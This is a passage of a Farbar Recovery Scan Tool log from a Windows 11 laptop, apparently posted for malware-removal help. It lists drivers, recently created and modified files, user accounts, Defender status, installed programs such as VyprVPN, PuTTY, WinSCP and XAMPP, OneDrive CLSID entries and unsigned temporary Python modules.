S3 tapvyprvpn; C:\Windows\System32\drivers\tapvyprvpn.sys [44896 2024-09-04] (Golden Frog, GmbH -> The OpenVPN Project)
R3 VyprVPNPerAppCallouts; C:\Windows\system32\DRIVERS\VyprPerAppCalloutDriver.sys [33856 2024-09-03] (Certida, LLC -> )
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [20016 2025-03-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [601520 2025-03-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [100768 2025-03-04] (Microsoft Windows -> Microsoft Corporation)
S3 WireGuard; C:\Windows\system32\DRIVERS\wireguard.sys [165376 2024-10-13] (Microsoft Windows Hardware Compatibility Publisher -> WireGuard LLC)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2025-03-09 15:28 - 2025-03-09 15:29 - 000027311 _____ C:\Users\LOQ\Desktop\FRST.txt
2025-03-09 15:28 - 2025-03-09 15:29 - 000000000 ____D C:\FRST
2025-03-09 15:28 - 2025-03-09 15:28 - 002404352 _____ (Farbar) C:\Users\LOQ\Desktop\FRST64.exe
2025-03-09 12:39 - 2025-03-09 12:39 - 001224256 _____ C:\Users\LOQ\Documents\vlc-record-2025-03-09-12h39m48s-1-.ts
2025-03-09 09:33 - 2025-03-09 11:00 - 000000000 ____D C:\2
2025-03-09 09:33 - 2025-03-09 09:33 - 000000000 ____D C:\Users\LOQ\Documents\SFVIP-Player
2025-03-09 09:31 - 2025-03-09 09:32 - 000000000 ____D C:\Users\LOQ\AppData\Roaming\SFVIP-Player
2025-03-09 09:31 - 2025-03-09 09:31 - 000000000 ____D C:\Windows\system32\Tasks\Maintenance Settings Control Panel
2025-03-09 09:31 - 2025-03-09 09:31 - 000000000 ____D C:\Users\LOQ\Desktop\2
2025-03-09 09:31 - 2025-03-09 09:31 - 000000000 ____D C:\Users\LOQ\AppData\Local\mpv
2025-03-09 09:29 - 2025-03-09 09:29 - 005944748 _____ C:\Users\LOQ\Documents\vlc-record-2025-03-09-09h29m01s-1-.ts
2025-03-09 09:28 - 2025-03-09 09:28 - 002538188 _____ C:\Users\LOQ\Documents\vlc-record-2025-03-09-09h28m44s-1-.ts
2025-03-09 09:28 - 2025-03-09 09:28 - 001588224 _____ C:\Users\LOQ\Documents\vlc-record-2025-03-09-09h28m24s-1-.ts
2025-03-09 09:27 - 2025-03-09 09:28 - 000000188 _____ C:\Users\LOQ\Desktop\1.m3u
2025-03-06 15:11 - 2025-03-06 15:11 - 000000984 _____ C:\Users\LOQ\Desktop\vps.txt
2025-03-05 19:58 - 2025-03-05 19:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FxSound
2025-03-05 19:58 - 2025-03-05 19:58 - 000000000 ____D C:\Program Files\FxSound LLC
2025-03-05 15:45 - 2025-03-05 15:45 - 000692356 _____ C:\Windows\system32\perfh005.dat
2025-03-05 15:45 - 2025-03-05 15:45 - 000143226 _____ C:\Windows\system32\perfc005.dat
2025-02-28 12:39 - 2025-02-28 12:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip
2025-02-28 12:39 - 2025-02-28 12:39 - 000000000 ____D C:\Program Files\7-Zip
2025-02-28 09:40 - 2025-02-28 09:40 - 000002264 _____ C:\Users\LOQ\AppData\LocalLow\DeviceId=468B_DeviceRevisionId=000C_DevicePciAddr=0.2.0_AppName=SystemSettings=_ApiClient=D3D12
2025-02-27 15:20 - 2025-02-27 15:20 - 000055896 _____ C:\Users\LOQ\AppData\LocalLow\ca012c203e65c9673dccadd3fb405963090900ca1d32fe807900369b43ac06f3
2025-02-27 15:20 - 2025-02-27 15:20 - 000000026 _____ C:\Users\LOQ\AppData\LocalLow\3aa1934f38b8938d0bf142ce4b0034c9326c13d2535b504e9cfdaee1dbfaaa26
2025-02-27 15:15 - 2025-02-17 18:09 - 002041944 _____ C:\Windows\system32\ze_intel_gpu_raytracing.dll
2025-02-27 15:15 - 2025-02-17 18:09 - 000803464 _____ C:\Windows\system32\ze_loader.dll
2025-02-27 15:15 - 2025-02-17 18:09 - 000787456 _____ (Intel) C:\Windows\system32\libvpl.dll
2025-02-27 15:15 - 2025-02-17 18:09 - 000671632 _____ (Intel) C:\Windows\SysWOW64\libvpl.dll
2025-02-27 15:15 - 2025-02-17 18:09 - 000563816 _____ C:\Windows\system32\ze_tracing_layer.dll
2025-02-27 15:15 - 2025-02-17 18:09 - 000430216 _____ C:\Windows\system32\ze_validation_layer.dll
2025-02-27 15:14 - 2025-02-17 18:09 - 027987000 _____ (Intel Corporation) C:\Windows\system32\mfxplugin64_hw.dll
2025-02-27 15:14 - 2025-02-17 18:09 - 020710968 _____ (Intel Corporation) C:\Windows\SysWOW64\mfxplugin32_hw.dll
2025-02-27 15:14 - 2025-02-17 18:09 - 000982248 _____ (Intel Corporation) C:\Windows\system32\libmfxhw64.dll
2025-02-27 15:14 - 2025-02-17 18:09 - 000740968 _____ (Intel Corporation) C:\Windows\SysWOW64\libmfxhw32.dll
2025-02-27 15:14 - 2025-02-17 18:09 - 000643360 _____ C:\Windows\SysWOW64\IntelControlLib32.dll
2025-02-27 15:14 - 2025-02-17 18:09 - 000624920 _____ (Intel Corporation) C:\Windows\system32\intel_gfx_api-x64.dll
2025-02-27 15:14 - 2025-02-17 18:09 - 000483904 _____ (Intel Corporation) C:\Windows\SysWOW64\intel_gfx_api-x86.dll
2025-02-27 15:13 - 2025-02-17 18:08 - 000347896 _____ C:\Windows\system32\ControlLib.dll
2025-02-27 15:13 - 2025-02-17 18:08 - 000294288 _____ C:\Windows\SysWOW64\ControlLib32.dll
2025-02-27 15:00 - 2025-02-27 15:00 - 000027135 _____ C:\Windows\SysWOW64\IntegratedServicesRegionPolicySet.json
2025-02-27 14:59 - 2025-02-27 14:59 - 000027135 _____ C:\Windows\system32\IntegratedServicesRegionPolicySet.json
2025-02-27 12:23 - 2025-03-09 15:26 - 000000000 ____D C:\Users\LOQ\AppData\Roaming\vlc
2025-02-27 12:23 - 2025-02-27 12:23 - 000000916 _____ C:\Users\Public\Desktop\VLC media player.lnk
2025-02-27 12:23 - 2025-02-27 12:23 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2025-02-27 10:56 - 2025-02-27 10:56 - 000000412 __RSH C:\ProgramData\ntuser.pol
2025-02-24 14:56 - 2025-02-24 15:00 - 000001325 _____ C:\Users\LOQ\Desktop\Nový Textový dokument (3).txt
2025-02-22 12:12 - 2025-03-09 11:07 - 000000830 _____ C:\Users\LOQ\Desktop\testepg.xml

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2025-03-09 15:21 - 2024-10-02 14:08 - 000199227 _____ C:\Users\LOQ\AppData\LocalLow\9b6b697c9226612e11308c87ba334920d402c22908e75d4618780ffb5e66e6c6
2025-03-09 15:21 - 2024-10-02 14:08 - 000000130 _____ C:\Users\LOQ\AppData\LocalLow\bb7848b4605a4a4009989ee80c586284295f80f113c0a7d8446897c753134572
2025-03-09 15:20 - 2024-10-08 08:44 - 000000000 ____D C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38
2025-03-09 15:19 - 2022-05-07 06:24 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2025-03-09 14:57 - 2025-02-05 15:47 - 000000000 ____D C:\Users\LOQ\Desktop\Nová složka (3)
2025-03-09 12:41 - 2025-01-13 12:35 - 000000000 ____D C:\Users\LOQ\Desktop\NICE
2025-03-09 12:41 - 2024-10-03 08:46 - 000058057 _____ C:\Users\LOQ\AppData\LocalLow\fa8425af64c4178c45c58cc62f401e68c266c106cfc402c5983dd025c8a96b16
2025-03-09 12:41 - 2024-10-03 08:46 - 000000130 _____ C:\Users\LOQ\AppData\LocalLow\91a738c110eef398bcff3d286bfe847876e4a83f85b6937e3dfde6a7eac100fe
2025-03-09 12:29 - 2025-02-02 11:28 - 000000000 ____D C:\Users\LOQ\AppData\Roaming\avidemux
2025-03-09 12:25 - 2024-10-02 13:52 - 000000000 ____D C:\ProgramData\NVIDIA
2025-03-09 12:23 - 2024-10-03 15:14 - 000000130 _____ C:\Users\LOQ\AppData\LocalLow\35c7f141452cbe9b817121749cb99bb97df101471424ef4682821aa7ba062a1e
2025-03-09 11:11 - 2024-10-03 08:40 - 000000128 _____ C:\Users\LOQ\AppData\Roaming\winscp.rnd
2025-03-09 11:07 - 2024-10-03 08:43 - 000000130 _____ C:\Users\LOQ\AppData\LocalLow\e2603909edd80daa99adf8a605ab4ede929d8f76e56646fd9d6a7721da4ef1d3
2025-03-09 09:22 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\SystemTemp
2025-03-09 09:16 - 2024-10-02 19:28 - 000000000 ____D C:\Windows\system32\SleepStudy
2025-03-08 17:45 - 2024-12-28 16:58 - 000066279 _____ C:\Users\LOQ\Desktop\HLAVNI.m3u
2025-03-08 17:41 - 2025-02-05 10:46 - 000000130 _____ C:\Users\LOQ\AppData\LocalLow\833f05f1221444344d1a4391fc39e811598c8d75772a64d6313da272adc01e97
2025-03-08 09:18 - 2024-10-02 19:28 - 000003640 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2025-03-08 09:18 - 2024-10-02 19:28 - 000003516 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2025-03-07 09:22 - 2024-10-07 08:40 - 000000000 ____D C:\Users\LOQ\AppData\Roaming\utorrent
2025-03-06 15:14 - 2024-10-03 12:09 - 000000128 _____ C:\Users\LOQ\AppData\Local\PUTTY.RND
2025-03-06 14:27 - 2024-10-08 08:44 - 000001073 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2025-03-06 14:27 - 2024-10-08 08:44 - 000000000 ____D C:\Program Files\Mozilla Firefox
2025-03-06 14:27 - 2024-10-08 08:44 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2025-03-06 09:02 - 2024-10-02 19:34 - 000000000 ____D C:\Users\LOQ\AppData\Local\D3DSCache
2025-03-05 20:53 - 2024-10-02 16:00 - 000000069 _____ C:\Users\LOQ\Desktop\Nový Textový dokument.txt
2025-03-05 19:59 - 2024-10-02 15:01 - 000000000 ____D C:\Users\LOQ\AppData\Roaming\FxSound
2025-03-05 19:58 - 2024-11-10 08:42 - 000000000 ____D C:\ProgramData\FxSound
2025-03-05 19:58 - 2024-10-02 15:01 - 000002036 _____ C:\Users\Public\Desktop\FxSound.lnk
2025-03-05 19:58 - 2024-10-02 15:01 - 000000000 ____D C:\Windows\system32\Tasks\FxSound
2025-03-05 19:42 - 2024-10-02 16:10 - 000014143 _____ C:\Users\LOQ\AppData\LocalLow\a3607a6b2e1dc3bb43eaf782a51165fbcd8155691ae38be380ef4590e4970ca7
2025-03-05 19:30 - 2022-05-07 06:24 - 000000000 ___HD C:\Program Files\WindowsApps
2025-03-05 19:30 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\AppReadiness
2025-03-05 17:34 - 2024-10-02 13:37 - 000002247 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2025-03-05 17:34 - 2024-10-02 13:37 - 000002206 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2025-03-05 16:20 - 2024-10-02 19:31 - 000000000 ____D C:\Users\LOQ
2025-03-05 15:45 - 2024-10-02 19:34 - 001629502 _____ C:\Windows\system32\PerfStringBackup.INI
2025-03-05 15:45 - 2022-05-07 06:22 - 000000000 ____D C:\Windows\INF
2025-03-05 15:40 - 2024-10-02 19:29 - 000001623 _____ C:\Windows\system32\config\VSMIDK
2025-03-05 15:40 - 2024-10-02 19:28 - 000012288 ___SH C:\DumpStack.log.tmp
2025-03-05 15:40 - 2024-10-02 19:28 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2025-03-05 15:40 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\ServiceState
2025-03-05 09:57 - 2025-02-05 10:46 - 000032289 _____ C:\Users\LOQ\AppData\LocalLow\7bd8d4e4dd73096252e24ed4b1a92fb83029a0d4aea327eb507c7d1d238137de
2025-03-04 18:29 - 2024-10-02 19:28 - 000000000 ____D C:\Windows\system32\Drivers\wd
2025-02-27 17:40 - 2024-10-02 16:10 - 000000026 _____ C:\Users\LOQ\AppData\LocalLow\1a502975f474237f85df48086ce857cfb61be8ffe8b4af5f40602eaa0c359118
2025-02-27 17:16 - 2024-10-03 08:43 - 000017333 _____ C:\Users\LOQ\AppData\LocalLow\4837628ab7406914f120c2b218bfbb313412c0d98399fad0ed61da55af1c68f1
2025-02-27 16:27 - 2024-10-03 15:14 - 000005861 _____ C:\Users\LOQ\AppData\LocalLow\00f0151efe7b0eb0135bce1e8118efa991d839242efeb27ca60814788ded3220
2025-02-27 15:21 - 2024-10-02 13:45 - 000005861 _____ C:\Users\LOQ\AppData\LocalLow\f0762e018b8c048e9b7d67e0f727aad35c791c6693130127d4b338879b84642d
2025-02-27 15:21 - 2024-10-02 13:45 - 000000026 _____ C:\Users\LOQ\AppData\LocalLow\2d12e94c65c1230728cf3b41cdc81c5f9a872b8b1ee76ef4fa5f80d66893515f
2025-02-27 15:19 - 2024-10-02 13:41 - 000000000 ____D C:\Windows\TempInst
2025-02-27 15:19 - 2022-05-07 06:17 - 000524288 _____ C:\Windows\system32\config\BBI
2025-02-27 15:05 - 2024-10-02 19:28 - 000304280 _____ C:\Windows\system32\FNTCACHE.DAT
2025-02-27 15:04 - 2023-12-04 07:26 - 000000000 ____D C:\Windows\system32\Microsoft-Edge-WebView
2025-02-27 15:04 - 2022-05-07 11:14 - 000000000 ____D C:\Windows\InboxApps
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ___SD C:\Windows\system32\UNP
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ___SD C:\Windows\system32\F12
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ___RD C:\Windows\PrintDialog
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\UUS
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\SysWOW64\setup
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\SysWOW64\Dism
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\SystemResources
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\system32\WinBioPlugIns
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\system32\ShellExperiences
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\system32\Sgrm
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\system32\setup
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\system32\PerceptionSimulation
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\system32\oobe
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\system32\migwiz
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\system32\HealthAttestationClient
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\system32\Dism
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\system32\appraiser
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\ShellExperiences
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\ShellComponents
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\PolicyDefinitions
2025-02-27 15:04 - 2022-05-07 06:24 - 000000000 ____D C:\Windows\bcastdvr
2025-02-27 15:03 - 2022-05-07 06:17 - 000000000 ____D C:\Windows\CbsTemp
2025-02-27 15:00 - 2024-10-02 19:31 - 003213312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll
2025-02-27 14:51 - 2024-10-02 15:34 - 000000000 ____D C:\Windows\system32\MRT
2025-02-27 14:37 - 2024-10-02 15:34 - 209365816 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2025-02-27 12:23 - 2024-10-03 12:32 - 000000000 ____D C:\Program Files\VideoLAN
2025-02-27 12:18 - 2024-10-02 16:11 - 000000298 _____ C:\Users\LOQ\AppData\LocalLow\49a0dc757a031a1a049f87c54688ec6e6b5bf131703371b2bdc1b04198f55cc5
2025-02-27 12:15 - 2024-10-07 09:10 - 000000000 ____D C:\ffmpeg
2025-02-27 12:10 - 2024-10-03 12:55 - 000023525 _____ C:\Users\LOQ\AppData\LocalLow\ba29f924631846a7646d729a8b5b9b9cea948f6a5b24231bfb94cbe83cb1f27e
2025-02-27 12:10 - 2024-10-03 12:55 - 000000130 _____ C:\Users\LOQ\AppData\LocalLow\e170d651be6b6807e4939dbc69d2cf32febca177eac891c2b4edcef2e0122634
2025-02-27 12:10 - 2024-10-02 16:11 - 000046929 _____ C:\Users\LOQ\AppData\LocalLow\c2f49a11760d17d0e61337eedafeeba03cbf45cf3e07dd76e289aeaa416c5ff7
2025-02-24 14:59 - 2024-10-03 08:40 - 000001122 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinSCP.lnk
2025-02-24 14:59 - 2024-10-03 08:40 - 000001110 _____ C:\Users\Public\Desktop\WinSCP.lnk
2025-02-24 14:59 - 2024-10-03 08:40 - 000000000 ____D C:\Program Files (x86)\WinSCP
2025-02-23 17:16 - 2025-02-03 17:28 - 000001037 _____ C:\Users\LOQ\Desktop\hukot.txt
2025-02-23 15:46 - 2024-10-02 14:06 - 000017930 _____ C:\Users\LOQ\AppData\LocalLow\1fbc38274e192889eecd001dbd6ab7bd36e234eccd3fd577fa0ab030ef1e1dbb
2025-02-18 18:19 - 2024-10-02 16:22 - 000001313 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo Now.lnk

==================== Files in the root of some directories ========

2024-10-03 08:40 - 2025-03-09 11:11 - 000000128 _____ () C:\Users\LOQ\AppData\Roaming\winscp.rnd
2024-10-03 12:09 - 2025-03-06 15:14 - 000000128 _____ () C:\Users\LOQ\AppData\Local\PUTTY.RND

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 06-03-2025
Ran by LOQ (09-03-2025 15:29:58)
Running from C:\Users\LOQ\Desktop
Microsoft Windows 11 Enterprise Version 23H2 22631.4890 (X64) (2024-10-02 18:29:52)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

(If an entry is included in the fixlist, it will be removed.)

Administrator (S-1-5-21-4161793325-174424039-3687507759-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-4161793325-174424039-3687507759-503 - Limited - Disabled)
Guest (S-1-5-21-4161793325-174424039-3687507759-501 - Limited - Disabled)
LOQ (S-1-5-21-4161793325-174424039-3687507759-1001 - Administrator - Enabled) => C:\Users\LOQ
WDAGUtilityAccount (S-1-5-21-4161793325-174424039-3687507759-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-4161793325-174424039-3687507759-1001\...\uTorrent) (Version: 3.6.0.47142 - BitTorrent Limited)
7-Zip 24.09 (x64) (HKLM\...\7-Zip) (Version: 24.09 - Igor Pavlov)
Avidemux VC++ 64bits (HKU\S-1-5-21-4161793325-174424039-3687507759-1001\...\{eaf0ff40-268b-4487-8987-9291e4f889e7}) (Version: 2.8.1 - Mean)
CrystalDiskInfo 9.4.4 (HKLM\...\CrystalDiskInfo_is1) (Version: 9.4.4 - Crystal Dew World)
FxSound (HKLM\...\{ABCDA086-3923-4EA1-8D69-6B173FD11EF2}) (Version: 1.1.30.0 - FxSound LLC)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 134.0.6998.36 - Google LLC)
HWiNFO® 64 (HKLM\...\HWiNFO® 64_is1) (Version: 8.12 - Martin Malik, REALiX s.r.o.)
InstallWintun (HKLM\...\{FE2AA480-D491-4272-92BC-EAE2101B8B94}) (Version: 1.0.0 - WireGuard LLC) Hidden
Intel(R) Extreme Tuning Utility SDK (HKLM\...\{3D3AC3C2-BD85-450E-BD2B-EF0E878B1E5F}_is1) (Version: 7.14.2.14 - Lenovo)
Lenovo Now (HKLM-x32\...\{622FA116-13E7-4BB6-839C-A3E0E3ECDFE6}_is1) (Version: 4.2.0.21 - Lenovo)
Lenovo Service Bridge (HKU\S-1-5-21-4161793325-174424039-3687507759-1001\...\{2C74547D-EF88-47F4-85F5-BE46A31E26B7}_is1) (Version: 5.0.2.17 - Lenovo)
Lenovo System Update (HKLM-x32\...\TVSU_is1) (Version: 5.08.03.59 - Lenovo)
Lenovo Vantage Service (HKLM-x32\...\VantageSRV_is1) (Version: 4.2.85.0 - Lenovo Group Ltd.)
Microsoft Edge WebView2 Runtime (HKLM-x32\...\Microsoft EdgeWebView) (Version: 133.0.3065.92 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29325 (HKLM-x32\...\{d7a6435f-ac9a-4af6-8fdc-ca130d13fac9}) (Version: 14.28.29325.2 - Microsoft Corporation)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.40.33810 (HKLM-x32\...\{5af95fd8-a22e-458f-acee-c61bd787178e}) (Version: 14.40.33810.0 - Microsoft Corporation)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.28.29325 (HKLM-x32\...\{B40FC85D-2B12-46E0-B950-E5B27E348793}) (Version: 14.28.29325 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.28.29325 (HKLM-x32\...\{EE2E15BB-54C8-4DB0-B1F3-026E3C166991}) (Version: 14.28.29325 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.40.33810 (HKLM\...\{59CED48F-EBFE-480C-8A38-FC079C2BEC0F}) (Version: 14.40.33810 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.40.33810 (HKLM\...\{B8B3BB4A-A10D-4F51-91B7-A64FFAC31EA7}) (Version: 14.40.33810 - Microsoft Corporation) Hidden
Mozilla Firefox (x64 cs) (HKLM\...\Mozilla Firefox 136.0 (x64 cs)) (Version: 136.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 131.0 - Mozilla)
NVIDIA FrameView SDK 1.3.8513.32290073 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.3.8513.32290073 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.28.0.417 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.28.0.417 - NVIDIA Corporation)
NVIDIA Ovladač HD audia 1.4.2.6 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.4.2.6 - NVIDIA Corporation)
NVIDIA Ovladače grafiky 566.26 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 566.26 - NVIDIA Corporation)
NVIDIA Systémový software PhysX 9.23.1019 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.23.1019 - NVIDIA Corporation)
PuTTY release 0.81 (64-bit) (HKLM\...\{DDC95F26-92B1-4546-9678-5DC68DF76BA0}) (Version: 0.81.0.0 - Simon Tatham)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.21 - VideoLAN)
VyprVPN (HKLM\...\{526B3DDC-6891-4F43-8F64-8B83DC9E4848}) (Version: 5.2.3 - Certida LLC)
WinRAR 7.01 (64-bit) (HKLM\...\WinRAR archiver) (Version: 7.01.0 - win.rar GmbH)
WinSCP 6.3.7 (HKLM-x32\...\winscp3_is1) (Version: 6.3.7 - Martin Prikryl)
XAMPP (HKLM\...\xampp) (Version: 8.2.12-0 - Apache Friends)

Packages:
=========
AppUp.IntelGraphicsExperience -> C:\Program Files\WindowsApps\AppUp.IntelGraphicsExperience_1.100.5688.0_x64__8j3eq9eme6ctt [2024-11-10] (INTEL CORP) [Startup Task]
Lenovo Companion -> C:\Program Files\WindowsApps\E046963F.LenovoCompanion_10.2501.20.0_x64__k1h2ywk1493x8 [2025-01-30] (LENOVO INC.)
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.967.0_x64__56jybvy8sckqj [2024-12-28] (NVIDIA Corp.)
WinRAR -> C:\Program Files\WinRAR [2024-12-09] (win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-4161793325-174424039-3687507759-1001_Classes\CLSID\{07CA83F0-DF06-4E67-89DD-E80924A49512}\localserver32 -> "C:\Users\LOQ\AppData\Local\Microsoft\OneDrive\24.171.0825.0002\FileCoAuth.exe" => No File
CustomCLSID: HKU\S-1-5-21-4161793325-174424039-3687507759-1001_Classes\CLSID\{1F80F4F0-5D28-40D3-A252-4D3662D5E4BA}\localserver32 -> "C:\Users\LOQ\AppData\Local\Microsoft\OneDrive\24.171.0825.0002\FileCoAuth.exe" => No File
CustomCLSID: HKU\S-1-5-21-4161793325-174424039-3687507759-1001_Classes\CLSID\{3A308EFE-656D-46BB-9963-0A41C0D6BCA2}\localserver32 -> "C:\Users\LOQ\AppData\Local\Microsoft\OneDrive\24.171.0825.0002\FileCoAuth.exe" => No File
CustomCLSID: HKU\S-1-5-21-4161793325-174424039-3687507759-1001_Classes\CLSID\{544c4c52-de0b-4d14-9510-21745381d5ca}\localserver32 -> "C:\Users\LOQ\AppData\Local\Microsoft\OneDrive\24.171.0825.0002\FileCoAuth.exe" => No File
CustomCLSID: HKU\S-1-5-21-4161793325-174424039-3687507759-1001_Classes\CLSID\{7AE67172-9863-42B1-8750-2B85084FD8E8}\localserver32 -> "C:\Users\LOQ\AppData\Local\Microsoft\OneDrive\24.171.0825.0002\FileCoAuth.exe" => No File
CustomCLSID: HKU\S-1-5-21-4161793325-174424039-3687507759-1001_Classes\CLSID\{F37369D9-1C22-40A0-A997-0B4D5F7B6637}\localserver32 -> "C:\Users\LOQ\AppData\Local\Microsoft\OneDrive\24.171.0825.0002\FileCoAuth.exe" => No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2024-11-29] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2024-11-29] (Igor Pavlov) [File not signed]
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\System32\DriverStore\FileRepository\nvlt.inf_amd64_49d0373b6410e907\nvshext.dll [2024-12-18] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2024-11-29] (Igor Pavlov) [File not signed]

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2024-12-08 18:10 - 2024-12-08 18:10 - 000102912 _____ () [File not signed] [File is in use] C:\Program Files (x86)\VyprVPN\GoldenFrogWFP.dll
2025-03-09 11:14 - 2025-03-09 11:14 - 000047616 _____ () [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI174642\_ctypes.pyd
2025-03-09 11:14 - 2025-03-09 11:14 - 001315840 _____ () [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI174642\wx._core.pyd
2025-03-09 11:14 - 2025-03-09 11:14 - 000046592 _____ () [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI174642\wx.siplib.pyd
2025-03-09 11:04 - 2025-03-09 11:04 - 000047616 _____ () [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI41802\_ctypes.pyd
2025-03-09 11:04 - 2025-03-09 11:04 - 001315840 _____ () [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI41802\wx._core.pyd
2025-03-09 11:04 - 2025-03-09 11:04 - 000046592 _____ () [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI41802\wx.siplib.pyd
2025-03-09 09:20 - 2025-03-09 09:20 - 000047616 _____ () [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI66162\_ctypes.pyd
2025-03-09 09:20 - 2025-03-09 09:20 - 001315840 _____ () [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI66162\wx._core.pyd
2025-03-09 09:20 - 2025-03-09 09:20 - 000046592 _____ () [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI66162\wx.siplib.pyd
